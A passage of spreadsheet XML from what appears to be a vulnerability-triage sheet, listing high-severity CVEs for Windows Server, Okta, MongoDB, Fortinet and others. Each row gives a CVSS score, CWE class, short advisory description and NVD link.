          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72936</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72981</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73313</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S350"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T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75021</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="S351"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T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77505</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S356"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T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S357"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T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83527</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86720</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
